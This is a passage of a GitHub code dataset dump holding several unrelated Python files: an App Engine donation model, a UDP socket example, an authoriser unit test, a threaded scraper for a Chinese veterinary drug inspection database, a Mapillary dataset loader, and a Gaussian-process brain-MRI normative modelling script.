self.flask\n","repo_name":"MrKooka/mega","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"}
{"seq_id":"35780909833","text":"from google.appengine.ext import ndb\r\n\r\n\r\nclass Donations(ndb.Model):\r\n    user = ndb.KeyProperty(kind='Users')\r\n    title = ndb.StringProperty(required=True)\r\n    city = ndb.StringProperty(required=True)\r\n    country = ndb.StringProperty(required=True)\r\n    state=ndb.StringProperty(required=True)\r\n    quantity = ndb.IntegerProperty(required=True)\r\n    comments = ndb.TextProperty()\r\n    photo_key = ndb.BlobKeyProperty()\r\n    photo_url = ndb.StringProperty()\r\n\r\n\r\n    @classmethod\r\n    def add_new_donation(cls, title, quantity, city, country, state,comments, photo_key, photo_url, user_key=None):\r\n        user_id = str(user_key.id())\r\n        donation_key = cls(title=title, quantity=quantity, city=city, country=country,state=state, comments=comments,\r\n                           photo_key=photo_key, photo_url=photo_url, user=user_key).put()\r\n        index = search.Index('donation')\r\n        doc = search.Document(doc_id=str(donation_key.id()), fields=[search.TextField(name='title', value=title),\r\n                                                                     search.TextField(name='city', value=city),\r\n                                                                     search.TextField(name='country', value=country),\r\n                                                                     search.TextField(name='state', value=state),\r\n                                                                     search.TextField(name='comments', value=comments),\r\n                                                                     search.NumberField(name='quantity',\r\n
search.NumberField(name='quantity',\r\n value=quantity),\r\n search.TextField(name='photo_url',\r\n value=photo_url),\r\n search.TextField(name='user_id', value=user_id)], )\r\n index.put(doc)\r\n\r\n @classmethod\r\n def get_all_donations_user(cls, user_id):\r\n index = search.Index('donation')\r\n query = 'user_id:(%s)' % user_id\r\n results = index.search(query)\r\n return results.results","repo_name":"kartit/cloudProject","sub_path":"default/modals/donation.py","file_name":"donation.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"10314693314","text":"import socket\n\n#Solo podemos coger puertos mayores a 1024\nPORT = 1024\nHOST = \"localhost\"\n\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\ns.bind((HOST, PORT))\n\nbuffer, addr = s.recvfrom(1024) #addr será una tupla (ip, puerto).\n #El receive será bloqueante, se quedará parado hasta que reciva un mensaje\n #Cada receive recibe un mensaje, si mandamos mas de 1, tenemos que hacer más\nprint(\"Received message: '\" + buffer.decode(\"utf-8\") + \"'\")\nprint(\"From address: '\" + str(addr) + \"'\")\n\ns.close()","repo_name":"Alexzape92/SD","sub_path":"Ejemplos_socket/udp_server.py","file_name":"udp_server.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"27332058220","text":"import os\nfrom unittest import mock\n\n\ndef test_index():\n with mock.patch.dict(os.environ, {\"DYNAMODB_TABLE\": \"hiya\"}, clear=True):\n import api.authoriser.index as index\n\n result = index.handler(event={\"methodArn\": \"foo\"})\n assert result == {\n \"principalId\": index.__file__,\n \"context\": {},\n \"policyDocument\": {\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Action\": \"execute-api:Invoke\",\n \"Effect\": \"Allow\",\n \"Resource\": \"foo\",\n }\n ],\n },\n }\n","repo_name":"NHSDigital/connecting-party-manager","sub_path":"src/api/authoriser/tests/test_index.py","file_name":"test_index.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"18525587406","text":"import requests\nimport json\nimport threading\nimport time\n\nlock=threading.Lock()\n\nheaders = {\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Accept-Language\": \"en-US,en;q=0.5\",\n 'Host':'sysjk.ivdc.org.cn:8081',\n 'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0\"}\n\ndef table_page(page):\n data={\n 'start':page*20,\n 'limit':20,\n 'condList':'',\n 'datatype':'all'\n }\n html=requests.post('http://sysjk.ivdc.org.cn:8081/cx/querysyjdcjjg/querysyjdcjjg.do', data=data,headers=headers).text\n data=json.loads(html)['rows']\n result=[]\n keys=['byx', 'jyxm', 'jylb', 'itemid', 'cpmc', 'bz', 'jyyj', 'jyjl', 'ph', 'cjhj', 'bhgxm', 'bcscqy', 'cpwh', 'shr', 'bcydwmc', 'jd', 'shrq', 'nd']\n for item in data:\n '''\n for key in item:\n keys.append(key)\n print(keys)\n return\n '''\n line=[]\n for key in keys:\n try:\n line.append(item[key])\n except:\n line.append('')\n result.append(line)\n return result\n\nclass Query(threading.Thread):\n def __init__(self,line):\n super(Query,self).__init__()\n self.line=line\n self.num=line[-6]\n\n def run(self):\n data={\n 'start':0,\n 
'limit':1,\n 'condList':str([{\"itemname\":\"pzwh\",\"itemfieldname\":\"pzwh\",\"itemval\":self.num,\"itemtype\":\"String\",\"condType\":\"val\",\"compareType\":\"equal\"}])\n }\n try:\n html=requests.post('http://sysjk.ivdc.org.cn:8081/cx/querysycppzwh/querySycppzwhData.do', data=data,headers=headers,timeout=30).text\n data=json.loads(html)['rows']\n keys=['gg', 'tym', 'yxq', 'zxbz', 'zt', 'byx', 'pzwh', 'bgqk', 'spm', 'slh', 'pzrq', 'qymc', 'shr', 'shrq', 'sxyy', 'itemid']\n query_line=[]\n for item in data:\n '''\n for key in item:\n keys.append(key)\n print(keys)\n return\n '''\n for key in keys:\n try:\n query_line.append(item[key])\n except:\n query_line.append('')\n except:\n query_line=[]\n self.result=self.line+query_line\n global lock\n with lock:\n f=open('data/6_sycj.txt','a',encoding='utf-8')\n f.write(str(self.result)+'\\n')\n f.close()\n\ndef main():\n page=0\n while True:\n table=table_page(page)\n if table==[]:\n break\n for item in table:\n work=Query(item)\n work.setDaemon(True)\n work.start()\n time.sleep(2)\n print(page,'ok')\n page+=1\n\nmain()\n","repo_name":"19js/Nyspider","sub_path":"sysjk.ivdc.org.cn/6_sycj.py","file_name":"6_sycj.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"50"} +{"seq_id":"19502111129","text":"import tensorflow as tf\nimport pickle\nimport numpy as np\n\nfrom core.Util import calculate_ious\nfrom datasets import DataKeys\nfrom datasets.Dataset import FileListDataset\nfrom datasets.Loader import register_dataset\nfrom datasets.util.BoundingBox import get_bbox_from_segmentation_mask_np\n\nNAME = \"mapillary_crop\"\nDEFAULT_PATH = \"/globalwork/voigtlaender/data/mapillary/\"\n\n\n@register_dataset(NAME, resolution=\"quarter\")\n@register_dataset(NAME + \"_full\", resolution=\"full\")\n@register_dataset(NAME + \"_half\", resolution=\"half\")\n@register_dataset(NAME + \"_quarter\", resolution=\"quarter\")\nclass MapillaryCropDataset(FileListDataset):\n def __init__(self, config, subset, resolution):\n self.resolution = resolution\n assert resolution in (\"quarter\", \"half\", \"full\"), resolution\n if resolution == \"full\":\n default_path = DEFAULT_PATH\n else:\n default_path = DEFAULT_PATH.replace(\"/mapillary/\", \"/mapillary_{}/\".format(resolution))\n super().__init__(config, NAME, subset, default_path, 2)\n det_data_path = config.string(\"det_data_path\", \"/globalwork/voigtlaender/data/mapillary_dets/Faster-R50C4/\")\n with open(det_data_path + \"/dets_\" + subset + \".pkl\", \"rb\") as f:\n self._det_data = pickle.load(f)\n self._instance_ids = {}\n self._data_list_path = \"datasets/Mapillary/\"\n self._id_divisor = 256\n self.proposal_sampling_exponent = config.float(\"proposal_sampling_exponent\", 0.0)\n\n def read_inputfile_lists(self):\n data_list = \"training.txt\" if self.subset == \"train\" else \"validation.txt\"\n data_list = self._data_list_path + \"/\" + data_list\n imgs = []\n anns = []\n with open(data_list) as f:\n for l in f:\n im, an, *im_ids_and_sizes = l.strip().split()\n im = self.data_dir + im\n an = self.data_dir + an\n found = False\n for id_and_size in im_ids_and_sizes:\n id_ = id_and_size.split(\":\")[0]\n #size_ = int(id_and_size.split(\":\")[1])\n cat_id = int(id_) // self._id_divisor\n # class 19 person\n # TODO: 20, 21, 22 could be used as ignore classes\n if cat_id == 19 and len(self._det_data[im.split(\"/\")[-1]]) > 0:\n found = True\n k = im.split(\"/\")[-1].replace(\".jpg\", \"\")\n if k not in self._instance_ids:\n 
self._instance_ids[k] = set()\n self._instance_ids[k].add(int(id_))\n if found:\n imgs.append(im)\n anns.append(an)\n return imgs, anns\n\n def load_annotation(self, img, img_filename, annotation_filename):\n ann_data = tf.read_file(annotation_filename)\n ann = tf.image.decode_image(ann_data, dtype=tf.uint16, channels=1)\n ann.set_shape(img.get_shape().as_list()[:-1] + [1])\n ann = self.postproc_annotation(annotation_filename, ann)\n return ann\n\n def postproc_annotation(self, ann_filename, ann):\n class_, bbox, mask = tf.py_func(self._postproc_annotation, [ann_filename, ann], [tf.int64, tf.float32, tf.uint8])\n class_.set_shape(())\n bbox.set_shape((4,))\n mask.set_shape((None, None, 1))\n return {DataKeys.CLASSES: class_, DataKeys.BBOXES_y0x0y1x1: bbox, DataKeys.SEGMENTATION_LABELS: mask}\n\n def _postproc_annotation(self, ann_filename, ann):\n ann_filename = ann_filename.decode(\"utf-8\")\n dets = self._det_data[ann_filename.split(\"/\")[-1].replace(\".png\", \".jpg\")]\n scores = dets[:, 4]\n # sample one\n probs = scores ** self.proposal_sampling_exponent\n probs /= probs.sum()\n idx = np.random.choice(dets.shape[0], p=probs)\n det = dets[idx]\n box = det[:4]\n if self.resolution == \"half\":\n box *= 2\n elif self.resolution == \"full\":\n box *= 4\n\n gt_ids = self._instance_ids[ann_filename.split(\"/\")[-1].replace(\".png\", \"\")]\n # get gt masks\n gt_masks = [(ann == id_).astype(np.uint8) for id_ in gt_ids]\n # get gt boxes\n gt_boxes = np.array([get_bbox_from_segmentation_mask_np(mask) for mask in gt_masks], np.float32)\n # change to (x0, y0, x1, y1)\n gt_boxes = gt_boxes[:, [1, 0, 3, 2]]\n ious = calculate_ious(box[np.newaxis], gt_boxes)[0]\n iou = ious.max()\n max_idx = ious.argmax()\n if iou > 0.5:\n class_ = np.cast[np.int64](1)\n mask = gt_masks[max_idx]\n else:\n class_ = np.cast[np.int64](0)\n mask = np.full_like(ann, 255, dtype=np.uint8)\n\n # shuffle to y0x0y1x1\n box_y0x0y1x1 = box[[1, 0, 3, 2]]\n return class_, box_y0x0y1x1, mask\n","repo_name":"VisualComputingInstitute/TrackR-CNN","sub_path":"datasets/Mapillary/Mapillary_crop.py","file_name":"Mapillary_crop.py","file_ext":"py","file_size_in_byte":4381,"program_lang":"python","lang":"en","doc_type":"code","stars":511,"dataset":"github-code","pt":"50"} +{"seq_id":"2472210716","text":"import argparse\nimport torch\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport statsmodels.api as sm\nimport matplotlib\nimport itertools\nmatplotlib.use('Agg')\nfrom pathlib import Path\nfrom lib import GenerationR, train_test_gpr, validate_gpr\nfrom sklearn.preprocessing import StandardScaler\n\n\nparser = argparse.ArgumentParser(description='sMRI-DP')\nparser.add_argument('-df', '--dataframe', type=Path)\nparser.add_argument('-tr', '--train-df', type=Path)\nparser.add_argument('-te', '--test-df', type=Path)\nparser.add_argument(\n '-ulw', '--use-last-wave', action='store_true', default=False)\nparser.add_argument('-ep', '--num-epochs', type=int, default=100)\nparser.add_argument('--random-state', '-rs', type=int, default=42)\nargs = parser.parse_args()\n\nif __name__ == '__main__':\n results_p = Path('./results')\n results_p.mkdir(parents=True, exist_ok=True)\n ds = GenerationR(df_path=args.dataframe,\n train_df=args.train_df,\n test_df=args.test_df,\n random_state=args.random_state,\n use_last_wave=args.use_last_wave)\n min_age, max_age = ds.min_max\n differential_num_steps = 1000\n dt = 1/(differential_num_steps - 1)\n diff_range = torch.linspace(0, 1, differential_num_steps)\n brain_measures = 
['volume', 'thickness']\n models = ['model2']\n brain_measures = ['volume']\n name_map = {'volume': 'vol', 'thickness': 'thickavg'}\n variables_not_to_correct = []\n means = ['ZeroMean']\n kernels = ['LinearKernel', 'MaternKernel', 'RBFKernel', 'RQKernel']\n model_params = list(itertools.product(means, kernels))\n pvalues_dict = {model: {'int_symptoms': None,\n 'ext_symptoms': None,\n 'dp_symptoms': None} for model in models}\n tvalues_dict = {model: {'int_symptoms': None,\n 'ext_symptoms': None,\n 'dp_symptoms': None} for model in models}\n pvalues_dict_abs = {\n model: {'int_symptoms': None,\n 'ext_symptoms': None,\n 'dp_symptoms': None} for model in models}\n tvalues_dict_abs = {\n model: {'int_symptoms': None,\n 'ext_symptoms': None,\n 'dp_symptoms': None} for model in models}\n kernel_dict_full = {model: None for model in models}\n pred_dict_full = {model: None for model in models}\n for model in models:\n pvalues_dict[model]['int_symptoms'] = {\n brain_measure: None for brain_measure in brain_measures}\n pvalues_dict[model]['ext_symptoms'] = {\n brain_measure: None for brain_measure in brain_measures}\n pvalues_dict[model]['dp_symptoms'] = {\n brain_measure: None for brain_measure in brain_measures}\n tvalues_dict[model]['int_symptoms'] = {\n brain_measure: None for brain_measure in brain_measures}\n tvalues_dict[model]['ext_symptoms'] = {\n brain_measure: None for brain_measure in brain_measures}\n tvalues_dict[model]['dp_symptoms'] = {\n brain_measure: None for brain_measure in brain_measures}\n pvalues_dict_abs[model]['int_symptoms'] = {\n brain_measure: None for brain_measure in brain_measures}\n pvalues_dict_abs[model]['ext_symptoms'] = {\n brain_measure: None for brain_measure in brain_measures}\n pvalues_dict_abs[model]['dp_symptoms'] = {\n brain_measure: None for brain_measure in brain_measures}\n tvalues_dict_abs[model]['int_symptoms'] = {\n brain_measure: None for brain_measure in brain_measures}\n tvalues_dict_abs[model]['ext_symptoms'] = {\n brain_measure: None for brain_measure in brain_measures}\n tvalues_dict_abs[model]['dp_symptoms'] = {\n brain_measure: None for brain_measure in brain_measures}\n kernel_dict_full[model] = {\n brain_measure: None for brain_measure in brain_measures}\n pred_dict_full[model] = {\n brain_measure: None for brain_measure in brain_measures}\n for brain_measure in brain_measures:\n brain_regions = ds.model_dict[model][brain_measure]\n region_names = [reg.replace(\n f'resid_{model}', '').replace(\n f'_{name_map[brain_measure]}_', ' ').replace(\n '_', ' ').capitalize().rstrip()\n for reg in brain_regions]\n pvalues_dict[model]['int_symptoms'][brain_measure] = {\n region_name: None for region_name in region_names}\n pvalues_dict[model]['ext_symptoms'][brain_measure] = {\n region_name: None for region_name in region_names}\n pvalues_dict[model]['dp_symptoms'][brain_measure] = {\n region_name: None for region_name in region_names}\n tvalues_dict[model]['int_symptoms'][brain_measure] = {\n region_name: None for region_name in region_names}\n tvalues_dict[model]['ext_symptoms'][brain_measure] = {\n region_name: None for region_name in region_names}\n tvalues_dict[model]['dp_symptoms'][brain_measure] = {\n region_name: None for region_name in region_names}\n pvalues_dict_abs[model]['int_symptoms'][brain_measure] = {\n region_name: None for region_name in region_names}\n pvalues_dict_abs[model]['ext_symptoms'][brain_measure] = {\n region_name: None for region_name in region_names}\n pvalues_dict_abs[model]['dp_symptoms'][brain_measure] = {\n 
region_name: None for region_name in region_names}\n tvalues_dict_abs[model]['int_symptoms'][brain_measure] = {\n region_name: None for region_name in region_names}\n tvalues_dict_abs[model]['ext_symptoms'][brain_measure] = {\n region_name: None for region_name in region_names}\n tvalues_dict_abs[model]['dp_symptoms'][brain_measure] = {\n region_name: None for region_name in region_names}\n kernel_dict_full[model][brain_measure] = {\n region_name: None for region_name in region_names\n }\n pred_dict_full[model][brain_measure] = {\n region_name: None for region_name in region_names\n }\n regression_dict = {region: {'z_scores': [],\n 'int_symptoms': [],\n 'ext_symptoms': [],\n 'dp_symptoms': []}\n for region in region_names}\n range_dict = {region: {'range_in': [],\n 'range_pred': []}\n for region in region_names}\n train_dict = {region_name: {} for region_name in region_names}\n diff_df = pd.DataFrame(\n np.zeros((len(brain_regions), 4)),\n index=region_names,\n columns=['min', 'max', 'avg', 'std'])\n for (region_name, brain_region) in \\\n zip(region_names, brain_regions):\n print(f'Validating region: {region_name}')\n train_dict[region_name] = {i: {'x_train': None,\n 'y_train': None}\n for i in range(len(ds.folds))}\n kernel_perf_dict = {f'{kernel}_{mean}': []\n for mean, kernel in model_params}\n #################################################\n # Performing validation\n #################################################\n for (i, (mean, kernel)) in enumerate(model_params):\n key = f'{kernel}_{mean}'\n for (k, fold) in enumerate(ds.folds):\n if not (fold['test'].empty or fold['train'].empty\n or fold['valid'].empty):\n x_train = fold['train'].loc[:, 'age_mri'].values\n x_valid = fold['valid'].loc[:, 'age_mri'].values\n\n x_train = (x_train - min_age) / (max_age - min_age)\n x_valid = (x_valid - min_age) / (max_age - min_age)\n\n y_train = np.reshape(fold['train'].loc[\n :, brain_region].values, (-1, 1))\n y_valid = np.reshape(fold['valid'].loc[\n :, brain_region].values, (-1, 1))\n\n scaler = StandardScaler(\n with_mean=True, with_std=True)\n y_train = scaler.fit_transform(y_train)\n y_valid = scaler.transform(y_valid)\n del scaler\n\n ll = validate_gpr(\n mean, kernel,\n x_train, x_valid,\n y_train, y_valid,\n num_epochs=args.num_epochs)\n kernel_perf_dict[key].append(ll)\n best_ll = -np.inf\n for (mean, kernel) in model_params:\n key = f'{kernel}_{mean}'\n if np.array(kernel_perf_dict[key]).mean() > best_ll:\n best_ll = np.array(kernel_perf_dict[key]).mean()\n best_kernel = kernel\n best_mean = mean\n best_key = key\n print(f'Brain region: {region_name}, '\n f'best kernel: {best_kernel}, '\n f'best mean: {best_mean}')\n kernel_dict_full[model][brain_measure][region_name] = best_key\n pred_df = pd.DataFrame()\n\n print(f'Predicting region: {region_name}')\n\n ####################################################\n # Test set prediction\n ####################################################\n diff_ls = []\n for (k, fold) in enumerate(ds.folds):\n if not (fold['test'].empty or fold['train'].empty\n or fold['valid'].empty):\n x_train = fold['train'].loc[:, 'age_mri'].values\n x_valid = fold['valid'].loc[:, 'age_mri'].values\n x_train = np.concatenate((x_train, x_valid))\n x_test = fold['test'].loc[:, 'age_mri'].values\n\n x_train = (x_train - min_age) / (max_age - min_age)\n x_valid = (x_valid - min_age) / (max_age - min_age)\n x_test = (x_test - min_age) / (max_age - min_age)\n\n y_train = np.reshape(fold['train'].loc[\n :, brain_region].values, (-1, 1))\n y_valid = 
np.reshape(fold['valid'].loc[\n :, brain_region].values, (-1, 1))\n y_train = np.concatenate(\n (y_train, y_valid))\n y_test = np.reshape(fold['test'].loc[\n :, brain_region].values, (-1, 1))\n\n scaler = StandardScaler()\n y_train = scaler.fit_transform(y_train)\n y_test = scaler.transform(y_test)\n\n train_dict[region_name][k]['x_train'] = x_train\n train_dict[region_name][k]['y_train'] = y_train\n del scaler\n\n range_in, range_pred, \\\n test_pred, trained_model, \\\n trained_likelihood = train_test_gpr(\n best_mean, best_kernel,\n x_train, x_test,\n y_train, y_test,\n num_epochs=args.num_epochs)\n\n with torch.no_grad():\n diff_y = trained_likelihood(\n trained_model(diff_range)).mean\n diff_ls.append(diff_y)\n\n range_dict[region_name]['range_in'].append(\n range_in)\n range_dict[region_name]['range_pred'].append(\n range_pred)\n\n int_symptoms = fold['test'].loc[\n :, ds.model_dict[model]['int_symptoms']].values\n ext_symptoms = fold['test'].loc[\n :, ds.model_dict[model]['ext_symptoms']].values\n dp_symptoms = fold['test'].loc[\n :, ds.model_dict[model]['dp_symptoms']].values\n z_score \\\n = (y_test.squeeze() -\n test_pred.mean.detach().numpy()) \\\n / test_pred.variance.detach().numpy()\n regression_dict[region_name]['z_scores'] \\\n += z_score.tolist()\n regression_dict[region_name]['int_symptoms'] \\\n += int_symptoms.tolist()\n regression_dict[region_name]['ext_symptoms'] \\\n += ext_symptoms.tolist()\n regression_dict[region_name]['dp_symptoms'] \\\n += dp_symptoms.tolist()\n\n temp_df = pd.DataFrame(\n np.empty((x_test.shape[0], 8)),\n columns=['x_test', 'y_test_mean', 'y_test_var',\n 'y_true', 'z_scores', 'int_symptoms',\n 'ext_symptoms', 'dp_symptoms'],\n index=fold['test'].index)\n temp_df['x_test'] = x_test\n temp_df['y_test_mean'] = test_pred.mean.numpy()\n temp_df['y_test_var'] \\\n = test_pred.variance.detach().numpy()\n temp_df['y_true'] = y_test\n temp_df['z_scores'] = z_score\n temp_df['int_symptoms'] = int_symptoms\n temp_df['ext_symptoms'] = ext_symptoms\n temp_df['dp_symptoms'] = dp_symptoms\n pred_df = pd.concat((pred_df, temp_df))\n fold_diff = torch.stack(diff_ls, dim=0).mean(0)\n dy_dt = (fold_diff[1:] - torch.roll(fold_diff, 1)[1:]) / dt\n diff_df.loc[region_name, :] = [dy_dt.min(), dy_dt.max(),\n dy_dt.mean(), dy_dt.std()]\n ############################################################################\n # Calculating p-value and rho\n ############################################################################\n pred_dict_full[model][brain_measure][region_name] = pred_df\n z_scores = np.array(regression_dict[region_name]['z_scores'])\n int_symptoms = np.array(\n regression_dict[region_name]['int_symptoms']).squeeze()\n ext_symptoms = np.array(\n regression_dict[region_name]['ext_symptoms']).squeeze()\n dp_symptoms = np.array(\n regression_dict[region_name]['dp_symptoms']).squeeze()\n\n int_mask = np.isfinite(int_symptoms) & np.isfinite(z_scores)\n ext_mask = np.isfinite(ext_symptoms) & np.isfinite(z_scores)\n dp_mask = np.isfinite(dp_symptoms) & np.isfinite(z_scores)\n\n reg_int = sm.OLS(z_scores[int_mask], int_symptoms[int_mask])\n reg_ext = sm.OLS(z_scores[ext_mask], ext_symptoms[ext_mask])\n reg_dp = sm.OLS(z_scores[dp_mask], dp_symptoms[dp_mask])\n res_int = reg_int.fit()\n res_ext = reg_ext.fit()\n res_dp = reg_dp.fit()\n\n reg_int_abs = sm.OLS(\n np.abs(z_scores[int_mask]), int_symptoms[int_mask])\n reg_ext_abs = sm.OLS(\n np.abs(z_scores[ext_mask]), ext_symptoms[ext_mask])\n reg_dp_abs = sm.OLS(\n np.abs(z_scores[dp_mask]), dp_symptoms[dp_mask])\n 
res_int_abs = reg_int_abs.fit()\n res_ext_abs = reg_ext_abs.fit()\n res_dp_abs = reg_dp_abs.fit()\n\n res_int_t, res_int_p = res_int.params[0], res_int.pvalues[0]\n res_ext_t, res_ext_p = res_ext.params[0], res_ext.pvalues[0]\n res_dp_t, res_dp_p = res_dp.params[0], res_dp.pvalues[0]\n\n res_int_t_abs, res_int_p_abs \\\n = res_int_abs.params[0], res_int_abs.pvalues[0]\n res_ext_t_abs, res_ext_p_abs \\\n = res_ext_abs.params[0], res_ext_abs.pvalues[0]\n res_dp_t_abs, res_dp_p_abs \\\n = res_dp_abs.params[0], res_dp_abs.pvalues[0]\n print(res_int_t, res_int_p, res_int_t_abs, res_int_p_abs)\n print(res_ext_t, res_ext_p, res_ext_t_abs, res_ext_p_abs)\n print(res_dp_t, res_dp_p, res_dp_t_abs, res_dp_p_abs)\n\n pvalues_dict[model][\n 'int_symptoms'][brain_measure][region_name] = res_int_p\n pvalues_dict[model][\n 'ext_symptoms'][brain_measure][region_name] = res_ext_p\n pvalues_dict[model][\n 'dp_symptoms'][brain_measure][region_name] = res_dp_p\n\n tvalues_dict[model][\n 'int_symptoms'][brain_measure][region_name] = res_int_t\n tvalues_dict[model][\n 'ext_symptoms'][brain_measure][region_name] = res_ext_t\n tvalues_dict[model][\n 'dp_symptoms'][brain_measure][region_name] = res_dp_t\n\n pvalues_dict_abs[model][\n 'int_symptoms'][brain_measure][region_name] = res_int_p_abs\n pvalues_dict_abs[model][\n 'ext_symptoms'][brain_measure][region_name] = res_ext_p_abs\n pvalues_dict_abs[model][\n 'dp_symptoms'][brain_measure][region_name] = res_dp_p_abs\n\n tvalues_dict_abs[model][\n 'int_symptoms'][brain_measure][region_name] = res_int_t_abs\n tvalues_dict_abs[model][\n 'ext_symptoms'][brain_measure][region_name] = res_ext_t_abs\n tvalues_dict_abs[model][\n 'dp_symptoms'][brain_measure][region_name] = res_dp_t_abs\n\n #######################################################\n # Plot dataset-wide results\n #######################################################\n plt_p = results_p / Path(f'{model}') \\\n / Path(f'{brain_measure}') / Path(f'{region_name}')\n if not plt_p.is_dir():\n plt_p.mkdir(parents=True, exist_ok=True)\n x_plot = (pred_df['x_test'].values[int_mask]\n * (max_age - min_age)) + min_age\n lower = pred_df['y_test_mean'].values[int_mask] \\\n - np.sqrt(pred_df['y_test_var'].values[int_mask])\n upper = pred_df['y_test_mean'].values[int_mask] \\\n + np.sqrt(pred_df['y_test_var'].values[int_mask])\n size_factor = 5\n\n x_sort_ix = x_plot.argsort()\n int_cmap = plt.get_cmap('spring')\n norm_c = (pred_df['int_symptoms'].values[int_mask]\n - min_age) / (max_age - min_age)\n fig, ax = plt.subplots(\n 1, 1, figsize=(30, 30), sharex=True, sharey=True)\n ax.scatter(x_plot, pred_df['y_true'].values[int_mask],\n c=norm_c,\n cmap=int_cmap,\n alpha=0.75,\n s=np.power((1 + norm_c), size_factor) * 15)\n ax.plot(x_plot[x_sort_ix],\n pred_df['y_test_mean'].values[int_mask][x_sort_ix],\n c='b', alpha=0.25)\n ax.legend(['Observed data', 'Predicted mean'])\n ax.title.set_text(f'{region_name}')\n fig.savefig(plt_p / Path('int_age_measure.png'))\n plt.close(fig)\n\n fig, ax = plt.subplots(\n 1, 1, figsize=(30, 30), sharex=True, sharey=True)\n ax.scatter(x_plot, pred_df['z_scores'].values[int_mask],\n c=norm_c,\n cmap=int_cmap,\n alpha=0.75,\n s=np.power((1 + norm_c), size_factor) * 15)\n ax.set_xlabel('Age')\n ax.set_ylabel('Z score')\n ax.title.set_text(f'{region_name}')\n fig.savefig(plt_p / Path('int_age_zscores.png'))\n plt.close(fig)\n\n x_plot = (pred_df['x_test'].values[ext_mask]\n * (max_age - min_age)) + min_age\n lower = pred_df['y_test_mean'].values[ext_mask] \\\n - 
np.sqrt(pred_df['y_test_var'].values[ext_mask])\n upper = pred_df['y_test_mean'].values[ext_mask] \\\n + np.sqrt(pred_df['y_test_var'].values[ext_mask])\n x_sort_ix = x_plot.argsort()\n ext_cmap = plt.get_cmap('summer')\n norm_c = (pred_df['ext_symptoms'].values[ext_mask]\n - min_age) / (max_age - min_age)\n fig, ax = plt.subplots(\n 1, 1, figsize=(30, 30), sharex=True, sharey=True)\n ax.scatter(x_plot, pred_df['y_true'].values[ext_mask],\n c=norm_c,\n cmap=ext_cmap,\n alpha=0.75,\n s=np.power((1 + norm_c), size_factor) * 15)\n ax.plot(x_plot[x_sort_ix],\n pred_df['y_test_mean'].values[ext_mask][x_sort_ix],\n c='b',\n alpha=0.25)\n ax.legend(['Observed data', 'Predicted mean'])\n ax.title.set_text(f'{region_name}')\n fig.savefig(plt_p / Path('ext_age_measure.png'))\n plt.close(fig)\n\n fig, ax = plt.subplots(\n 1, 1, figsize=(30, 30), sharex=True, sharey=True)\n ax.scatter(x_plot, pred_df['z_scores'].values[ext_mask],\n c=norm_c,\n cmap=ext_cmap,\n alpha=0.75,\n s=np.power((1 + norm_c), size_factor) * 15)\n ax.set_xlabel('Age')\n ax.set_ylabel('Z score')\n ax.title.set_text(f'{region_name}')\n fig.savefig(plt_p / Path('ext_age_zscores.png'))\n plt.close(fig)\n\n x_plot = (pred_df['x_test'].values[dp_mask]\n * (max_age - min_age)) + min_age\n lower = pred_df['y_test_mean'].values[dp_mask] \\\n - np.sqrt(pred_df['y_test_var'].values[dp_mask])\n upper = pred_df['y_test_mean'].values[dp_mask] \\\n + np.sqrt(pred_df['y_test_var'].values[dp_mask])\n x_sort_ix = x_plot.argsort()\n dp_cmap = plt.get_cmap('autumn')\n norm_c = (pred_df['dp_symptoms'].values[dp_mask]\n - min_age) / (max_age - min_age)\n fig, ax = plt.subplots(\n 1, 1, figsize=(30, 30), sharex=True, sharey=True)\n ax.scatter(x_plot, pred_df['y_true'].values[dp_mask],\n c=norm_c,\n cmap=dp_cmap,\n alpha=0.75,\n s=np.power((1 + norm_c), size_factor) * 15)\n ax.plot(x_plot[x_sort_ix],\n pred_df['y_test_mean'].values[dp_mask][x_sort_ix],\n c='b', alpha=0.25)\n ax.legend(['Observed data', 'Predicted mean'])\n ax.title.set_text(f'{region_name}')\n fig.savefig(plt_p / Path('ext_age_measure.png'))\n plt.close(fig)\n\n fig, ax = plt.subplots(\n 1, 1, figsize=(30, 30), sharex=True, sharey=True)\n ax.scatter(x_plot, pred_df['z_scores'].values[dp_mask],\n c=norm_c,\n cmap=dp_cmap,\n alpha=0.75,\n s=np.power((1 + norm_c), size_factor) * 15)\n ax.set_xlabel('Age')\n ax.set_ylabel('Z score')\n ax.title.set_text(f'{region_name}')\n fig.savefig(plt_p / Path('ext_age_zscores.png'))\n plt.close(fig)\n\n diff_p = Path('results') / Path(f'{model}') \\\n / Path(f'{brain_measure}')\n if not diff_p.is_dir():\n diff_p.mkdir(parents=True, exist_ok=True)\n diff_df.to_csv(diff_p / Path('differential.csv'))\n\n for (k, fold) in enumerate(ds.folds):\n if not (fold['test'].empty or fold['train'].empty\n or fold['valid'].empty):\n fold_p = results_p / Path(f'fold_{k}')\n if not fold_p.is_dir():\n fold_p.mkdir(parents=True, exist_ok=True)\n plt.clf()\n rows = int(np.ceil(len(region_names) / 4))\n fig_shape = (rows, 4)\n fig, axs = plt.subplots(\n *fig_shape, figsize=(30, 30), sharex=True, sharey=True)\n for (i, (region_name, brain_region)) in enumerate(\n zip(region_names, brain_regions)):\n range_in = range_dict[region_name]['range_in'][k]\n range_std = np.sqrt(range_dict[region_name][\n 'range_pred'][k].variance.detach().numpy())\n mean_pred = range_dict[region_name][\n 'range_pred'][k].mean.detach().numpy()\n lower = mean_pred - range_std\n upper = mean_pred + range_std\n\n y_train = np.reshape(fold['train'].loc[\n :, brain_region].values, (-1, 1))\n y_valid 